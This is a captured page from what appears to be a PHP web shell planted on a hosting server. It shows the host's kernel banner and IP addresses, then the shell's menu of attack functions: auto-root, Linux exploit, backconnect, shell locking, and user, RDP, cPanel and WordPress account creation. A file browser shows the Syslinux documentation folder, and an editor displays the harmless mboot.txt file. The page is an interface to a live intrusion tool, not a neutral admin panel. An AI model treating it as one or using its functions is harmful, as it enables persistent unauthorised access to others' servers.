Linux clientvps21.redlake.in 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
LiteSpeed
: 95.216.48.241 | : 216.73.216.125
14 Domain
8.1.34
mydemowebs
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
syslinux /
[ HOME SHELL ]
Name
Size
Permission
Action
logo
[ DIR ]
drwxr-xr-x
sample
[ DIR ]
drwxr-xr-x
CodingStyle.txt
29.36
KB
-rw-r--r--
NEWS
76.22
KB
-rw-r--r--
README
1.59
KB
-rw-r--r--
SubmittingPatches.txt
20.33
KB
-rw-r--r--
building.txt
1.18
KB
-rw-r--r--
chain.txt
12.37
KB
-rw-r--r--
cptime.txt
947
B
-rw-r--r--
distrib.txt
1.18
KB
-rw-r--r--
extlinux.txt
4.59
KB
-rw-r--r--
gpt.txt
2.72
KB
-rw-r--r--
isolinux.txt
4.46
KB
-rw-r--r--
keytab-lilo.txt
3.58
KB
-rw-r--r--
mboot.txt
931
B
-rw-r--r--
memdisk.txt
11.26
KB
-rw-r--r--
menu.txt
17.12
KB
-rw-r--r--
pxechn.txt
4.55
KB
-rw-r--r--
pxelinux.txt
16.42
KB
-rw-r--r--
rfc5071.txt
26.15
KB
-rw-r--r--
sdi.txt
5.48
KB
-rw-r--r--
syslinux.txt
31.77
KB
-rw-r--r--
usbkey.txt
2.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mboot.txt
mboot.c32 --------- mboot.c32 is a 32-bit ELF module that allows Syslinux and its variants to load and boot kernels that use the Multiboot standard (e.g. the Xen virtual machine monitor, and the Fiasco and GNU Mach microkernels). To load a multiboot kernel and modules in Syslinux, put mboot.c32 (from com32/modules) in the boot directory, and load it as the "kernel" in the configuration file. The command-line to pass to mboot.c32 is the kernel command-line, followed by all the module command lines, separated with '---'. For example, to load a Xen VMM, xenlinux and an initrd: DEFAULT mboot.c32 xen.gz dom0_mem=15000 nosmp noacpi --- linux.gz console=tty0 root=/dev/hda1 --- initrd.img or, as a choice in a menu: LABEL Xen KERNEL mboot.c32 APPEND xen.gz dom0_mem=15000 nosmp noacpi --- linux.gz console=tty0 root=/dev/hda1 --- initrd.img mboot.c32 requires version 2.12 or later of Syslinux. Tim Deegan, May 2005
Close